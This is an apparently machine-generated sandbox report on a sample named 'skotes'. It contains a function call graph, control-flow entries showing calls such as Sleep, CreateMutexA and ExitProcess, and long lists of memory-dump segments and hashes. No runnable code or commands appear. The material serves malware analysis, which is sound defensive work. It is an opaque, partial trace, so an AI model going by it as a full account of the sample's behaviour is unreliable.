603cb4 11549->11550 11551 602410 5 API calls 11549->11551 11554 603810 4 API calls 11550->11554 11552 603ca5 11551->11552 11553 603ce0 RtlAllocateHeap 11552->11553 11553->11550 11555 603ccf 11554->11555 11556 603810 4 API calls 11555->11556 11557 603cdb 11556->11557 11558 617d50 RtlAllocateHeap 11557->11558 11560 603d52 11557->11560 11558->11560 11559 61d3e2 RtlAllocateHeap 11561 603d84 11559->11561 11560->11559 11562 617d50 RtlAllocateHeap 11561->11562 11564 603e03 11561->11564 11562->11564 11563 603e9b shared_ptr 11564->11563 11565 636c6a RtlAllocateHeap 11564->11565 11566 603ec1 11565->11566 11574 605a9e 11577 605a61 11574->11577 11575 6180c0 RtlAllocateHeap 11575->11577 11577->11574 11577->11575 11578 617a00 RtlAllocateHeap 11577->11578 11579 605bdd __floor_pentium4 11577->11579 11580 605730 11577->11580 11578->11577 11584 605860 shared_ptr 11580->11584 11588 605799 shared_ptr 11580->11588 11581 60592a 11589 618200 11581->11589 11582 6180c0 RtlAllocateHeap 11582->11588 11585 605900 shared_ptr __floor_pentium4 11584->11585 11586 636c6a RtlAllocateHeap 11584->11586 11585->11577 11587 605934 11586->11587 11588->11581 11588->11582 11588->11584 11592 61c1d9 11589->11592 11591 61820a 11595 61c15d 11592->11595 11594 61c1ea Concurrency::cancel_current_task 11594->11591 11596 6022e0 std::invalid_argument::invalid_argument RtlAllocateHeap 11595->11596 11597 61c16f 11596->11597 11597->11594 11641 603970 11642 61c68b __Mtx_init_in_situ 2 API calls 11641->11642 11643 6039a7 11642->11643 11644 61c68b __Mtx_init_in_situ 2 API calls 11643->11644 11645 6039e6 11644->11645 11646 602170 11651 61c6fc 11646->11651 11649 61d64e RtlAllocateHeap 11650 602184 11649->11650 11652 60217a 11651->11652 11653 61c70c 11651->11653 11652->11649 11653->11652 11655 61cfbe 11653->11655 11656 61ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 11655->11656 11657 61cfd0 11656->11657 11657->11653 11658 603770 11659 60379b 11658->11659 11660 6037cd shared_ptr 11659->11660 11661 636c6a RtlAllocateHeap 11659->11661 11662 60380f 11661->11662 11663 605f76 11665 605f81 shared_ptr 11663->11665 11664 605ffe shared_ptr __floor_pentium4 11665->11664 11666 636c6a RtlAllocateHeap 11665->11666 11667 60601b 11666->11667 11668 6180c0 RtlAllocateHeap 11667->11668 11669 606089 11668->11669 11670 6180c0 RtlAllocateHeap 11669->11670 11671 6060bd 11670->11671 11672 6180c0 RtlAllocateHeap 11671->11672 11673 6060ee 11672->11673 11674 6180c0 RtlAllocateHeap 11673->11674 11675 60611f 11674->11675 11676 6180c0 RtlAllocateHeap 11675->11676 11677 606150 11676->11677 11678 6065b1 shared_ptr __floor_pentium4 11677->11678 11679 636c6a RtlAllocateHeap 11677->11679 11680 6065dc 11679->11680 11681 617a00 RtlAllocateHeap 11680->11681 11682 6066a6 11681->11682 11683 605c10 4 API calls 11682->11683 11684 6066ac 11683->11684 11685 605c10 4 API calls 11684->11685 11686 6066b1 11685->11686 11687 6022c0 4 API calls 11686->11687 11688 6066c9 shared_ptr 11687->11688 11689 617a00 RtlAllocateHeap 11688->11689 11690 606732 11689->11690 11691 605c10 4 API calls 11690->11691 11692 60673d 11691->11692 11693 6022c0 4 API calls 11692->11693 11702 606757 shared_ptr 11693->11702 11694 606852 11695 6180c0 RtlAllocateHeap 11694->11695 11697 60689c 11695->11697 11696 617a00 RtlAllocateHeap 11696->11702 11698 6180c0 RtlAllocateHeap 11697->11698 11700 6068e3 shared_ptr __floor_pentium4 11698->11700 11699 605c10 4 API calls 11699->11702 11701 6022c0 4 API calls 11701->11702 11702->11694 11702->11696 11702->11699 11702->11701 11743 609f44 11744 609f4c shared_ptr 11743->11744 11745 60a92b 11744->11745 11746 60a01f shared_ptr 11744->11746 11747 60a953 Sleep CreateMutexA 11745->11747 11748 636c6a RtlAllocateHeap 11745->11748 11749 6180c0 RtlAllocateHeap 11746->11749 11750 60a98e 11747->11750 11748->11747 11751 60a903 11749->11751 11752 60a54d 11753 60a555 shared_ptr 11752->11753 11754 60a628 shared_ptr 11753->11754 11755 60a944 11753->11755 11758 6180c0 RtlAllocateHeap 11754->11758 11756 636c6a RtlAllocateHeap 11755->11756 11757 60a949 11756->11757 11759 60a94e 11757->11759 11760 636c6a RtlAllocateHeap 11757->11760 11761 60a903 11758->11761 11762 60a953 Sleep CreateMutexA 11759->11762 11763 636c6a RtlAllocateHeap 11759->11763 11760->11759 11764 60a98e 11762->11764 11763->11762 11777 60215a 11778 61c6fc InitializeCriticalSectionEx 11777->11778 11779 602164 11778->11779 11780 61d64e RtlAllocateHeap 11779->11780 11781 60216e 11780->11781 11802 604120 11803 60416a 11802->11803 11805 6041b2 Concurrency::details::_ContextCallback::_CallInContext __floor_pentium4 11803->11805 11806 603ee0 11803->11806 11807 603f48 11806->11807 11811 603f1e 11806->11811 11808 603f58 11807->11808 11812 602c00 11807->11812 11808->11805 11811->11805 11813 61d3e2 RtlAllocateHeap 11812->11813 11814 602c0e 11813->11814 11822 61b847 11814->11822 11816 602c42 11817 602c49 11816->11817 11828 602c80 11816->11828 11817->11805 11819 602c58 11831 602560 11819->11831 11821 602c65 Concurrency::cancel_current_task 11823 61b854 11822->11823 11827 61b873 Concurrency::details::_Reschedule_chore 11822->11827 11834 61cb77 11823->11834 11825 61b864 11825->11827 11836 61b81e 11825->11836 11827->11816 11842 61b7fb 11828->11842 11830 602cb2 shared_ptr 11830->11819 11832 6338af ___std_exception_copy RtlAllocateHeap 11831->11832 11833 602597 __floor_pentium4 11832->11833 11833->11821 11835 61cb92 CreateThreadpoolWork 11834->11835 11835->11825 11837 61b827 Concurrency::details::_Reschedule_chore 11836->11837 11840 61cdcc 11837->11840 11839 61b841 11839->11827 11841 61cde1 TpPostWork 11840->11841 11841->11839 11843 61b807 11842->11843 11844 61b817 11842->11844 11843->11844 11846 61ca78 11843->11846 11844->11830 11847 61ca8d TpReleaseWork 11846->11847 11847->11844 11868 618320 11869 618339 11868->11869 11870 61834d 11869->11870 11871 618f40 RtlAllocateHeap 11869->11871 11871->11870 11872 636729 11875 636672 11872->11875 11874 63673b 11877 63667e __dosmaperr 11875->11877 11876 636685 11878 6375f6 __dosmaperr RtlAllocateHeap 11876->11878 11877->11876 11879 6366a5 11877->11879 11880 63668a 11878->11880 11882 6366b7 11879->11882 11883 6366aa 11879->11883 11881 636c5a ___std_exception_copy RtlAllocateHeap 11880->11881 11888 636695 11881->11888 11889 63a8c3 11882->11889 11884 6375f6 __dosmaperr RtlAllocateHeap 11883->11884 11884->11888 11886 6366c0 11887 6375f6 __dosmaperr RtlAllocateHeap 11886->11887 11886->11888 11887->11888 11888->11874 11890 63a8cf __dosmaperr 11889->11890 11893 63a967 11890->11893 11892 63a8ea 11892->11886 11898 63a98a 11893->11898 11894 63d82f __dosmaperr RtlAllocateHeap 11895 63a9eb 11894->11895 11896 63adf5 __freea RtlAllocateHeap 11895->11896 11897 63a9d0 11896->11897 11897->11892 11898->11894 11898->11897 11907 606535 11908 606549 shared_ptr 11907->11908 11909 636c6a RtlAllocateHeap 11908->11909 11910 6065b1 shared_ptr __floor_pentium4 11908->11910 11911 6065dc 11909->11911 11912 617a00 RtlAllocateHeap 11911->11912 11913 6066a6 11912->11913 11914 605c10 4 API calls 11913->11914 11915 6066ac 11914->11915 11916 605c10 4 API calls 11915->11916 11917 6066b1 11916->11917 11918 6022c0 4 API calls 11917->11918 11919 6066c9 shared_ptr 11918->11919 11920 617a00 RtlAllocateHeap 11919->11920 11921 606732 11920->11921 11922 605c10 4 API calls 11921->11922 11923 60673d 11922->11923 11924 6022c0 4 API calls 11923->11924 11933 606757 shared_ptr 11924->11933 11925 606852 11926 6180c0 RtlAllocateHeap 11925->11926 11928 60689c 11926->11928 11927 617a00 RtlAllocateHeap 11927->11933 11929 6180c0 RtlAllocateHeap 11928->11929 11931 6068e3 shared_ptr __floor_pentium4 11929->11931 11930 605c10 4 API calls 11930->11933 11932 6022c0 4 API calls 11932->11933 11933->11925 11933->11927 11933->11930 11933->11932 11982 61d111 11984 61d122 11982->11984 11983 61d12a 11984->11983 11986 61d199 11984->11986 11987 61d1a7 SleepConditionVariableCS 11986->11987 11989 61d1c0 11986->11989 11987->11989 11989->11984 11993 602b10 11994 602b1a 11993->11994 11995 602b1c 11993->11995 11996 61c26a 5 API calls 11995->11996 11997 602b22 11996->11997 11998 618510 11999 61856c 11998->11999 12000 61855f 11998->12000 12002 6185c4 11999->12002 12025 61a060 11999->12025 12004 619d00 12000->12004 12005 619e31 12004->12005 12007 619d25 12004->12007 12006 619270 RtlAllocateHeap 12005->12006 12017 619d8b __cftof 12006->12017 12008 619e2c 12007->12008 12010 619da1 12007->12010 12011 619d7a 12007->12011 12012 602480 RtlAllocateHeap 12008->12012 12009 636c6a RtlAllocateHeap 12016 619e3b 12009->12016 12015 61d3e2 RtlAllocateHeap 12010->12015 12010->12017 12011->12008 12013 619d85 12011->12013 12012->12005 12014 61d3e2 RtlAllocateHeap 12013->12014 12014->12017 12015->12017 12018 619e6a shared_ptr 12016->12018 12019 636c6a RtlAllocateHeap 12016->12019 12017->12009 12020 619dfc shared_ptr __cftof 12017->12020 12018->11999 12021 619e8e 12019->12021 12020->11999 12022 619ec0 shared_ptr 12021->12022 12023 636c6a RtlAllocateHeap 12021->12023 12022->11999 12024 619ee6 12023->12024 12026 61a1b1 12025->12026 12029 61a083 12025->12029 12027 619270 RtlAllocateHeap 12026->12027 12038 61a0e4 __cftof 12027->12038 12028 636c6a RtlAllocateHeap 12031 61a1bb shared_ptr 12028->12031 12030 61a1ac 12029->12030 12032 61a0d3 12029->12032 12033 61a0fd 12029->12033 12034 602480 RtlAllocateHeap 12030->12034 12031->11999 12032->12030 12035 61a0de 12032->12035 12037 61d3e2 RtlAllocateHeap 12033->12037 12033->12038 12034->12026 12036 61d3e2 RtlAllocateHeap 12035->12036 12036->12038 12037->12038 12038->12028 12039 61a16c shared_ptr __cftof 12038->12039 12039->11999 12040 60211c 12041 602126 12040->12041 12042 61d64e RtlAllocateHeap 12041->12042 12043 602132 12042->12043 12084 603fe0 12085 604022 12084->12085 12086 6040d2 12085->12086 12087 60408c 12085->12087 12090 604035 __floor_pentium4 12085->12090 12088 603ee0 4 API calls 12086->12088 12091 6035e0 12087->12091 12088->12090 12092 61d3e2 RtlAllocateHeap 12091->12092 12093 603616 12092->12093 12097 60364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 12093->12097 12098 602ce0 12093->12098 12095 60369e 12096 602c00 4 API calls 12095->12096 12095->12097 12096->12097 12097->12090 12099 602d1d 12098->12099 12100 61bedf InitOnceExecuteOnce 12099->12100 12101 602d46 12100->12101 12102 602d51 __floor_pentium4 12101->12102 12103 602d88 12101->12103 12107 61bef7 12101->12107 12102->12095 12105 602440 4 API calls 12103->12105 12106 602d9b 12105->12106 12106->12095 12108 61bf03 12107->12108 12116 602900 12108->12116 12110 61bf23 Concurrency::cancel_current_task 12111 61bf73 12110->12111 12112 61bf6a 12110->12112 12114 602ae0 5 API calls 12111->12114 12126 61be7f 12112->12126 12115 61bf6f 12114->12115 12115->12103 12117 6180c0 RtlAllocateHeap 12116->12117 12118 60294f 12117->12118 12119 6026b0 RtlAllocateHeap 12118->12119 12120 602967 12119->12120 12121 60298d shared_ptr 12120->12121 12122 636c6a RtlAllocateHeap 12120->12122 12121->12110 12123 6029b6 12122->12123 12124 6338af ___std_exception_copy RtlAllocateHeap 12123->12124 12125 6029e4 12124->12125 12125->12110 12127 61cc31 InitOnceExecuteOnce 12126->12127 12128 61be97 12127->12128 12129 61be9e 12128->12129 12130 636cbb 4 API calls 12128->12130 12129->12115 12131 61bea7 12130->12131 12131->12115 12132 6185e0 12133 6185f6 12132->12133 12133->12133 12134 61860b 12133->12134 12135 618f40 RtlAllocateHeap 12133->12135 12135->12134 12136 618de0 12137 618e05 12136->12137 12138 618f2f 12136->12138 12142 618e76 12137->12142 12143 618e4c 12137->12143 12139 619270 RtlAllocateHeap 12138->12139 12140 618f34 12139->12140 12141 602480 RtlAllocateHeap 12140->12141 12149 618e5d __cftof 12141->12149 12147 61d3e2 RtlAllocateHeap 12142->12147 12142->12149 12143->12140 12144 618e57 12143->12144 12146 61d3e2 RtlAllocateHeap 12144->12146 12145 636c6a RtlAllocateHeap 12148 618f3e 12145->12148 12146->12149 12147->12149 12149->12145 12150 618eed shared_ptr __cftof 12149->12150 12151 6055f0 12152 605610 12151->12152 12153 6022c0 4 API calls 12152->12153 12154 605710 __floor_pentium4 12152->12154 12153->12152 12155 6043f0 12156 61bedf InitOnceExecuteOnce 12155->12156 12157 60440a 12156->12157 12158 604411 12157->12158 12159 636cbb 4 API calls 12157->12159 12160 604424 12159->12160 12199 6021c0 12200 6021d0 12199->12200 12201 6021cb 12199->12201 12202 6021d4 12200->12202 12207 6021ec __cftof 12200->12207 12203 6375f6 __dosmaperr RtlAllocateHeap 12202->12203 12204 6021d9 12203->12204 12206 636c5a ___std_exception_copy RtlAllocateHeap 12204->12206 12205 6021fc __cftof 12208 6021e4 12206->12208 12207->12205 12209 602221 12207->12209 12210 60223a 12207->12210 12212 6375f6 __dosmaperr RtlAllocateHeap 12209->12212 12211 602231 12210->12211 12213 6375f6 __dosmaperr RtlAllocateHeap 12210->12213 12214 602226 12212->12214 12215 602247 12213->12215 12216 636c5a ___std_exception_copy RtlAllocateHeap 12214->12216 12217 636c5a ___std_exception_copy RtlAllocateHeap 12215->12217 12216->12211 12218 602252 12217->12218 12224 6179c0 12225 6179e0 12224->12225 12225->12225 12226 6180c0 RtlAllocateHeap 12225->12226 12227 6179f2 12226->12227 12228 6183c0 12229 617760 RtlAllocateHeap 12228->12229 12230 618439 12229->12230 12231 618f40 RtlAllocateHeap 12230->12231 12232 618454 12230->12232 12231->12232 12233 618f40 RtlAllocateHeap 12232->12233 12235 6184a8 12232->12235 12234 6184ee 12233->12234 12240 6087d0 12241 6088d3 12240->12241 12249 608819 shared_ptr 12240->12249 12242 6180c0 RtlAllocateHeap 12241->12242 12248 608923 12242->12248 12243 60896c 12246 618200 RtlAllocateHeap 12243->12246 12244 608949 shared_ptr 12245 6180c0 RtlAllocateHeap 12245->12249 12247 608971 12246->12247 12248->12244 12250 636c6a RtlAllocateHeap 12248->12250 12249->12241 12249->12243 12249->12245 12249->12248 12250->12243 12291 609ba5 12292 609ba7 12291->12292 12293 617a00 RtlAllocateHeap 12292->12293 12294 609ca9 12293->12294 12295 605c10 4 API calls 12294->12295 12296 609cb1 12295->12296 12297 608b30 4 API calls 12296->12297 12298 609cc2 12297->12298 12299 618220 RtlAllocateHeap 12298->12299 12300 609cd1 12299->12300 12314 60b7b1 12315 60b7be 12314->12315 12316 617a00 RtlAllocateHeap 12315->12316 12317 60b7f3 12316->12317 12318 617a00 RtlAllocateHeap 12317->12318 12319 60b80b 12318->12319 12320 617a00 RtlAllocateHeap 12319->12320 12321 60b823 12320->12321 12322 617a00 RtlAllocateHeap 12321->12322 12323 60b835 12322->12323 12324 6367b7 12325 6367c3 __dosmaperr 12324->12325 12326 6367cd 12325->12326 12330 6367e2 12325->12330 12327 6375f6 __dosmaperr RtlAllocateHeap 12326->12327 12328 6367d2 12327->12328 12329 636c5a ___std_exception_copy RtlAllocateHeap 12328->12329 12332 6367dd 12329->12332 12330->12332 12333 636740 12330->12333 12334 636762 12333->12334 12335 63674d 12333->12335 12341 63675d 12334->12341 12349 63a038 12334->12349 12336 6375f6 __dosmaperr RtlAllocateHeap 12335->12336 12337 636752 12336->12337 12339 636c5a ___std_exception_copy RtlAllocateHeap 12337->12339 12339->12341 12341->12332 12345 636785 12366 63aebb 12345->12366 12348 63adf5 __freea RtlAllocateHeap 12348->12341 12350 63a050 12349->12350 12351 636777 12349->12351 12350->12351 12352 63afe4 RtlAllocateHeap 12350->12352 12355 63b00b 12351->12355 12353 63a06e 12352->12353 12381 640439 12353->12381 12356 63b022 12355->12356 12357 63677f 12355->12357 12356->12357 12358 63adf5 __freea RtlAllocateHeap 12356->12358 12359 63afe4 12357->12359 12358->12357 12360 63aff0 12359->12360 12361 63b005 12359->12361 12362 6375f6 __dosmaperr RtlAllocateHeap 12360->12362 12361->12345 12363 63aff5 12362->12363 12364 636c5a ___std_exception_copy RtlAllocateHeap 12363->12364 12365 63b000 12364->12365 12365->12345 12367 63aee1 12366->12367 12368 63aecc 12366->12368 12370 63af2a 12367->12370 12375 63af08 12367->12375 12369 6375e3 __dosmaperr RtlAllocateHeap 12368->12369 12372 63aed1 12369->12372 12371 6375e3 __dosmaperr RtlAllocateHeap 12370->12371 12373 63af2f 12371->12373 12374 6375f6 __dosmaperr RtlAllocateHeap 12372->12374 12376 6375f6 __dosmaperr RtlAllocateHeap 12373->12376 12379 63678b 12374->12379 12399 63ae2f 12375->12399 12378 63af37 12376->12378 12380 636c5a ___std_exception_copy RtlAllocateHeap 12378->12380 12379->12341 12379->12348 12380->12379 12382 640445 __dosmaperr 12381->12382 12383 640465 12382->12383 12384 64044d 12382->12384 12386 640500 12383->12386 12391 640497 12383->12391 12385 6375e3 __dosmaperr RtlAllocateHeap 12384->12385 12387 640452 12385->12387 12388 6375e3 __dosmaperr RtlAllocateHeap 12386->12388 12389 6375f6 __dosmaperr RtlAllocateHeap 12387->12389 12390 640505 12388->12390 12397 64045a 12389->12397 12392 6375f6 __dosmaperr RtlAllocateHeap 12390->12392 12395 6375f6 __dosmaperr RtlAllocateHeap 12391->12395 12391->12397 12393 64050d 12392->12393 12394 636c5a ___std_exception_copy RtlAllocateHeap 12393->12394 12394->12397 12396 6404be 12395->12396 12398 6375e3 __dosmaperr RtlAllocateHeap 12396->12398 12397->12351 12398->12397 12400 63ae3b __dosmaperr 12399->12400 12401 63ae70 12400->12401 12402 63ae7b 12400->12402 12406 63af48 12401->12406 12404 6375f6 __dosmaperr RtlAllocateHeap 12402->12404 12405 63ae76 12404->12405 12405->12379 12417 63c0de 12406->12417 12408 63af58 12409 63af90 12408->12409 12410 63c0de RtlAllocateHeap 12408->12410 12412 63af5e 12408->12412 12411 63c0de RtlAllocateHeap 12409->12411 12409->12412 12414 63af87 12410->12414 12411->12412 12413 63afd8 12412->12413 12415 6375c0 __dosmaperr RtlAllocateHeap 12412->12415 12413->12405 12416 63c0de RtlAllocateHeap 12414->12416 12415->12413 12416->12409 12418 63c100 12417->12418 12419 63c0eb 12417->12419 12421 6375e3 __dosmaperr RtlAllocateHeap 12418->12421 12425 63c125 12418->12425 12420 6375e3 __dosmaperr RtlAllocateHeap 12419->12420 12422 63c0f0 12420->12422 12423 63c130 12421->12423 12424 6375f6 __dosmaperr RtlAllocateHeap 12422->12424 12426 6375f6 __dosmaperr RtlAllocateHeap 12423->12426 12428 63c0f8 12424->12428 12425->12408 12427 63c138 12426->12427 12429 636c5a ___std_exception_copy RtlAllocateHeap 12427->12429 12428->12408 12429->12428 12430 606db5 12431 606dc2 12430->12431 12432 606df5 12431->12432 12433 606dca 12431->12433 12435 6180c0 RtlAllocateHeap 12432->12435 12434 6180c0 RtlAllocateHeap 12433->12434 12436 606deb shared_ptr 12434->12436 12435->12436 12437 606ec1 shared_ptr 12436->12437 12438 636c6a RtlAllocateHeap 12436->12438 12439 606ee3 12438->12439 12440 638bbe 12441 638868 4 API calls 12440->12441 12442 638bdc 12441->12442 12458 608980 12459 608aea 12458->12459 12466 6089d8 shared_ptr 12458->12466 12460 617a00 RtlAllocateHeap 12460->12466 12461 605c10 4 API calls 12461->12466 12462 608b20 12464 618200 RtlAllocateHeap 12462->12464 12463 6180c0 RtlAllocateHeap 12463->12466 12465 608b25 12464->12465 12467 636c6a RtlAllocateHeap 12465->12467 12466->12459 12466->12460 12466->12461 12466->12462 12466->12463 12466->12465 12468 608b2a 12467->12468 12500 602b90 12501 602bce 12500->12501 12502 61b7fb TpReleaseWork 12501->12502 12503 602bdb shared_ptr __floor_pentium4 12502->12503 12504 603f9f 12505 603fad 12504->12505 12509 603fc5 12504->12509 12506 602410 5 API calls 12505->12506 12507 603fb6 12506->12507 12508 603ce0 RtlAllocateHeap 12507->12508 12508->12509

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 358 63652b-636538 call 63a302 361 63655a-63656c call 63656d ExitProcess 358->361 362 63653a-636548 GetPEB 358->362 362->361 363 63654a-636559 362->363 363->361
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ExitProcess.KERNEL32(?,?,0063652A,?,?,?,?,?,00637661), ref: 00636567
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.1486178970.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.1486079645.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486178970.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486598692.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486617811.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486658352.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486673887.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486691158.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486798163.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486817828.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486843858.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486863331.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486915608.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486930876.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486945694.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486965787.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486983847.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486999480.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487025692.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487043861.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487065166.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487083690.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487110165.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487128440.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487149781.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487167064.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487185341.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487204949.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487230454.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487247568.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487264556.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487284342.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487302608.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487320510.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487339666.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487356200.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487371192.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487386011.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487401136.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487416008.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487430765.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487445085.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487466619.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487484405.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487503324.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487520463.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487540232.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487556831.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487573270.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487635756.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487650878.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487671613.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487688557.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487711172.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487727174.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                                            • Opcode ID: c417c7a8ca3abbf1001f37680510ab477acda5585b6f6b132b1254aeade921e7
                                                                                                                                                                                            • Instruction ID: 573008ddafc69689feb32c1971866956c272b57ec8f0ad8c5dfc102f224e6407
                                                                                                                                                                                            • Opcode Fuzzy Hash: c417c7a8ca3abbf1001f37680510ab477acda5585b6f6b132b1254aeade921e7
                                                                                                                                                                                            • Instruction Fuzzy Hash: E9E04630001108ABDA25BF58C8099983B2AEB42765F108D24FD0986222CB65ED81D681

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 0060A963
                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00663254), ref: 0060A981
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.1486178970.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.1486079645.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486178970.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
